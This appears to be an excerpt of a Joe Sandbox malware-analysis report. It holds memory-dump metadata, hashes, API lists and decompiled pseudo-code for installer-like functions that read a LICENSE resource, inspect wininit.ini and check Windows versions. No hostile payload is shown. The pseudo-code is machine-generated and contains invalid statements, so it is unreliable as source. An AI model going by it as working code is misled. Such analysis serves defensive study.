                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                        • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                        • API String ID: 3346862599-1109908249
                                                                                                                                                                                                        • Opcode ID: e2b18f5e924b05ec645ca0589956ac57d54f104c6aa9305a6bdb1a25fe7de7e4
                                                                                                                                                                                                        • Instruction ID: 9fa0f1929975788df63a4d7dcff8035aadfe27f4bd26c64a5430edf414ac2c6c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e2b18f5e924b05ec645ca0589956ac57d54f104c6aa9305a6bdb1a25fe7de7e4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67318D31A002289FEB31CB11CC44FAEB7BCFB46768F1441A9E949A6250DB359E85CF52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C3A3F(void* __eflags) {
                                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = "LICENSE";
                                                                                                                                                                                                        				_t1 = E000C468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				 *0xc8d4c = _t3;
                                                                                                                                                                                                        				if(_t3 != 0) {
                                                                                                                                                                                                        					_t19 = _t16;
                                                                                                                                                                                                        					if(E000C468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA( *0xc8d4c, "<None>") == 0) {
                                                                                                                                                                                                        							LocalFree( *0xc8d4c);
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0xc9124 = 0;
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t9 = E000C6517(_t19, 0x7d1, 0, E000C3100, 0, 0);
                                                                                                                                                                                                        						LocalFree( *0xc8d4c);
                                                                                                                                                                                                        						if(_t9 != 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xc9124 = 0x800704c7;
                                                                                                                                                                                                        						L2:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E000C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree( *0xc8d4c);
                                                                                                                                                                                                        					 *0xc9124 = 0x80070714;
                                                                                                                                                                                                        					goto L2;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E000C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0xc9124 = E000C6285();
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        0x000c3a46
                                                                                                                                                                                                        0x000c3a57
                                                                                                                                                                                                        0x000c3a5d
                                                                                                                                                                                                        0x000c3a63
                                                                                                                                                                                                        0x000c3a6a
                                                                                                                                                                                                        0x000c3a91
                                                                                                                                                                                                        0x000c3a9a
                                                                                                                                                                                                        0x000c3ad8
                                                                                                                                                                                                        0x000c3b13
                                                                                                                                                                                                        0x000c3b19
                                                                                                                                                                                                        0x000c3b1b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3b21
                                                                                                                                                                                                        0x000c3ae7
                                                                                                                                                                                                        0x000c3af4
                                                                                                                                                                                                        0x000c3afc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3afe
                                                                                                                                                                                                        0x000c3a87
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3a87
                                                                                                                                                                                                        0x000c3aa8
                                                                                                                                                                                                        0x000c3ab3
                                                                                                                                                                                                        0x000c3ab9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3ab9
                                                                                                                                                                                                        0x000c3a78
                                                                                                                                                                                                        0x000c3a82
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46A0
                                                                                                                                                                                                          • Part of subcall function 000C468F: SizeofResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46A9
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46C3
                                                                                                                                                                                                          • Part of subcall function 000C468F: LoadResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46CC
                                                                                                                                                                                                          • Part of subcall function 000C468F: LockResource.KERNEL32(00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46D3
                                                                                                                                                                                                          • Part of subcall function 000C468F: memcpy_s.MSVCRT ref: 000C46E5
                                                                                                                                                                                                          • Part of subcall function 000C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,000C2F64,?,00000002,00000000), ref: 000C3A5D
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 000C3AB3
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                          • Part of subcall function 000C6285: GetLastError.KERNEL32(000C5BBC), ref: 000C6285
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 000C3AD0
                                                                                                                                                                                                        • LocalFree.KERNEL32 ref: 000C3B13
                                                                                                                                                                                                          • Part of subcall function 000C6517: FindResourceA.KERNEL32(000C0000,000007D6,00000005), ref: 000C652A
                                                                                                                                                                                                          • Part of subcall function 000C6517: LoadResource.KERNEL32(000C0000,00000000,?,?,000C2EE8,00000000,000C19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 000C6538
                                                                                                                                                                                                          • Part of subcall function 000C6517: DialogBoxIndirectParamA.USER32(000C0000,00000000,00000547,000C19E0,00000000), ref: 000C6557
                                                                                                                                                                                                          • Part of subcall function 000C6517: FreeResource.KERNEL32(00000000,?,?,000C2EE8,00000000,000C19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 000C6560
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,000C3100,00000000,00000000), ref: 000C3AF4
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$LICENSE
                                                                                                                                                                                                        • API String ID: 2414642746-383193767
                                                                                                                                                                                                        • Opcode ID: aaca7c776ee2ed7d36c7798582c4b3b76eae8e5757099a39509a346dedbd2288
                                                                                                                                                                                                        • Instruction ID: 90e8e55e78bb539c19a3b5bd0737e026a286fbe687dbc310f220de8e78860229
                                                                                                                                                                                                        • Opcode Fuzzy Hash: aaca7c776ee2ed7d36c7798582c4b3b76eae8e5757099a39509a346dedbd2288
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F11DA713006016BE7245F32AC09F5F3AF9EBD6740B10802EBA42D61E1DA7D8C109765
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E000C24E0(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t7;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				long _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = __ebx;
                                                                                                                                                                                                        				_t7 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                        				_t25 = 0x104;
                                                                                                                                                                                                        				_t26 = 0;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					E000C658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                        					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                        						_lclose(_t25);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x000c24e0
                                                                                                                                                                                                        0x000c24eb
                                                                                                                                                                                                        0x000c24f2
                                                                                                                                                                                                        0x000c24f7
                                                                                                                                                                                                        0x000c2504
                                                                                                                                                                                                        0x000c250e
                                                                                                                                                                                                        0x000c251d
                                                                                                                                                                                                        0x000c252c
                                                                                                                                                                                                        0x000c2541
                                                                                                                                                                                                        0x000c2546
                                                                                                                                                                                                        0x000c2553
                                                                                                                                                                                                        0x000c2555
                                                                                                                                                                                                        0x000c2555
                                                                                                                                                                                                        0x000c2546
                                                                                                                                                                                                        0x000c256c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 000C2506
                                                                                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 000C252C
                                                                                                                                                                                                        • _lopen.KERNEL32 ref: 000C253B
                                                                                                                                                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 000C254C
                                                                                                                                                                                                        • _lclose.KERNEL32(00000000), ref: 000C2555
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                        • String ID: wininit.ini
                                                                                                                                                                                                        • API String ID: 3273605193-4206010578
                                                                                                                                                                                                        • Opcode ID: b6d6d68c0b91f28bff28d3db6448457e71764ffdbee71aaa504114907cd0450f
                                                                                                                                                                                                        • Instruction ID: 957546df49f5726337be3acf6649ea86062541370075b70ca48cf90d9ca6c828
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6d6d68c0b91f28bff28d3db6448457e71764ffdbee71aaa504114907cd0450f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2201B532B0011867D7209B659C0CEDFBBBCDB46794F100169FA49D3190DE788E45CAA5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E000C36EE(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                        				signed int _v420;
                                                                                                                                                                                                        				signed int _v424;
                                                                                                                                                                                                        				CHAR* _v428;
                                                                                                                                                                                                        				CHAR* _v432;
                                                                                                                                                                                                        				signed int _v436;
                                                                                                                                                                                                        				CHAR* _v440;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                        				CHAR* _t77;
                                                                                                                                                                                                        				CHAR* _t91;
                                                                                                                                                                                                        				CHAR* _t94;
                                                                                                                                                                                                        				int _t97;
                                                                                                                                                                                                        				CHAR* _t98;
                                                                                                                                                                                                        				signed char _t99;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				signed short _t107;
                                                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                                                        				short _t113;
                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                        				signed char _t115;
                                                                                                                                                                                                        				short _t119;
                                                                                                                                                                                                        				CHAR* _t123;
                                                                                                                                                                                                        				CHAR* _t124;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                                                        				signed int _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				CHAR* _t138;
                                                                                                                                                                                                        				signed int _t139;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t72 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        				_t115 = __ecx;
                                                                                                                                                                                                        				_t135 = 0;
                                                                                                                                                                                                        				_v432 = __ecx;
                                                                                                                                                                                                        				_t138 = 0;
                                                                                                                                                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                        					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                        					_t119 = 2;
                                                                                                                                                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                        					__eflags = _t77;
                                                                                                                                                                                                        					if(_t77 == 0) {
                                                                                                                                                                                                        						_t119 = 0;
                                                                                                                                                                                                        						__eflags = 1;
                                                                                                                                                                                                        						 *0xc8184 = 1;
                                                                                                                                                                                                        						 *0xc8180 = 1;
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						 *0xc9a40 = _t119;
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						__eflags =  *0xc8a34 - _t138; // 0x0
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t115;
                                                                                                                                                                                                        						if(_t115 == 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v428 = _t135;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                        						_t11 =  &_v420;
                                                                                                                                                                                                        						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                        						__eflags =  *_t11;
                                                                                                                                                                                                        						_v440 = _t115;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_v424 = _t135 * 0x18;
                                                                                                                                                                                                        							_v436 = E000C2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                        							_t91 = E000C2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                        							_t123 = _v436;
                                                                                                                                                                                                        							_t133 = 0x54d;
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 < 0) {
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								__eflags = _v420 - 1;
                                                                                                                                                                                                        								if(_v420 == 1) {
                                                                                                                                                                                                        									_t138 = 0x54c;
                                                                                                                                                                                                        									L36:
                                                                                                                                                                                                        									__eflags = _t138;
                                                                                                                                                                                                        									if(_t138 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										__eflags = _t138 - _t133;
                                                                                                                                                                                                        										if(_t138 == _t133) {
                                                                                                                                                                                                        											L30:
                                                                                                                                                                                                        											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                        											_t115 = 0;
                                                                                                                                                                                                        											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                        											__eflags = _t138 - _t133;
                                                                                                                                                                                                        											_t133 = _v432;
                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                        												_t124 = _v440;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                        												_v420 =  &_v268;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t124;
                                                                                                                                                                                                        											if(_t124 == 0) {
                                                                                                                                                                                                        												_t135 = _v436;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t99 = _t124[0x30];
                                                                                                                                                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                        												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                        													asm("sbb ebx, ebx");
                                                                                                                                                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t115 = 0x104;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xc8a38 & 0x00000001;
                                                                                                                                                                                                        											if(( *0xc8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        												L64:
                                                                                                                                                                                                        												_push(0);
                                                                                                                                                                                                        												_push(0x30);
                                                                                                                                                                                                        												_push(_v420);
                                                                                                                                                                                                        												_push("cent");
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												__eflags = _t135;
                                                                                                                                                                                                        												if(_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												__eflags =  *_t135;
                                                                                                                                                                                                        												if( *_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												MessageBeep(0);
                                                                                                                                                                                                        												_t94 = E000C681F(_t115);
                                                                                                                                                                                                        												__eflags = _t94;
                                                                                                                                                                                                        												if(_t94 == 0) {
                                                                                                                                                                                                        													L57:
                                                                                                                                                                                                        													0x180030 = 0x30;
                                                                                                                                                                                                        													L58:
                                                                                                                                                                                                        													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                        													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                        														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                        															goto L66;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														__eflags = _t97 - 1;
                                                                                                                                                                                                        														L62:
                                                                                                                                                                                                        														if(__eflags == 0) {
                                                                                                                                                                                                        															_t138 = 0;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L66;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													__eflags = _t97 - 6;
                                                                                                                                                                                                        													goto L62;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t98 = E000C67C9(_t124, _t124);
                                                                                                                                                                                                        												__eflags = _t98;
                                                                                                                                                                                                        												if(_t98 == 0) {
                                                                                                                                                                                                        													goto L57;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                        										if(_t138 == 0x54c) {
                                                                                                                                                                                                        											goto L30;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138;
                                                                                                                                                                                                        										if(_t138 == 0) {
                                                                                                                                                                                                        											goto L66;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t135 = 0;
                                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                                        										goto L44;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L37:
                                                                                                                                                                                                        									_t129 = _v432;
                                                                                                                                                                                                        									__eflags = _t129[0x7c];
                                                                                                                                                                                                        									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t133 =  &_v268;
                                                                                                                                                                                                        									_t104 = E000C28E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                        									__eflags = _t104;
                                                                                                                                                                                                        									if(_t104 != 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t135 = _v428;
                                                                                                                                                                                                        									_t133 = 0x54d;
                                                                                                                                                                                                        									_t138 = 0x54d;
                                                                                                                                                                                                        									goto L40;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							if(_t91 > 0) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 != 0) {
                                                                                                                                                                                                        								__eflags = _t91;
                                                                                                                                                                                                        								if(_t91 != 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                        								L27:
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L28:
                                                                                                                                                                                                        								__eflags = _t135;
                                                                                                                                                                                                        								if(_t135 == 0) {
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t138 = 0x54c;
                                                                                                                                                                                                        								goto L30;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                        							if(_t91 != 0) {
                                                                                                                                                                                                        								_t131 = _v424;
                                                                                                                                                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                        							_t109 = _v424;
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                        							goto L27;
                                                                                                                                                                                                        							L33:
                                                                                                                                                                                                        							_t135 =  &(_t135[1]);
                                                                                                                                                                                                        							_v428 = _t135;
                                                                                                                                                                                                        							_v420 = _t135;
                                                                                                                                                                                                        							__eflags = _t135 - 2;
                                                                                                                                                                                                        						} while (_t135 < 2);
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t77 == 1;
                                                                                                                                                                                                        					if(_t77 == 1) {
                                                                                                                                                                                                        						 *0xc9a40 = _t119;
                                                                                                                                                                                                        						 *0xc8184 = 1;
                                                                                                                                                                                                        						 *0xc8180 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - 3;
                                                                                                                                                                                                        						if(_t133 > 3) {
                                                                                                                                                                                                        							__eflags = _t133 - 5;
                                                                                                                                                                                                        							if(_t133 < 5) {
                                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t113 = 3;
                                                                                                                                                                                                        							_t119 = _t113;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t119 = 1;
                                                                                                                                                                                                        						_t114 = 3;
                                                                                                                                                                                                        						 *0xc9a40 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - _t114;
                                                                                                                                                                                                        						if(__eflags < 0) {
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0xc8184 = _t135;
                                                                                                                                                                                                        							 *0xc8180 = _t135;
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t138 = 0x4ca;
                                                                                                                                                                                                        					goto L44;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t138 = 0x4b4;
                                                                                                                                                                                                        					L44:
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					L65:
                                                                                                                                                                                                        					_t133 = _t138;
                                                                                                                                                                                                        					E000C44B9(0, _t138);
                                                                                                                                                                                                        					L66:
                                                                                                                                                                                                        					return E000C6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x000c36f9
                                                                                                                                                                                                        0x000c3700
                                                                                                                                                                                                        0x000c370c
                                                                                                                                                                                                        0x000c3716
                                                                                                                                                                                                        0x000c3718
                                                                                                                                                                                                        0x000c371b
                                                                                                                                                                                                        0x000c3721
                                                                                                                                                                                                        0x000c372b
                                                                                                                                                                                                        0x000c373d
                                                                                                                                                                                                        0x000c3745
                                                                                                                                                                                                        0x000c3746
                                                                                                                                                                                                        0x000c3746
                                                                                                                                                                                                        0x000c3749
                                                                                                                                                                                                        0x000c37ab
                                                                                                                                                                                                        0x000c37ad
                                                                                                                                                                                                        0x000c37ae
                                                                                                                                                                                                        0x000c37b3
                                                                                                                                                                                                        0x000c37b8
                                                                                                                                                                                                        0x000c37b8
                                                                                                                                                                                                        0x000c37bf
                                                                                                                                                                                                        0x000c37bf
                                                                                                                                                                                                        0x000c37c5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c37cb
                                                                                                                                                                                                        0x000c37cd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c37d5
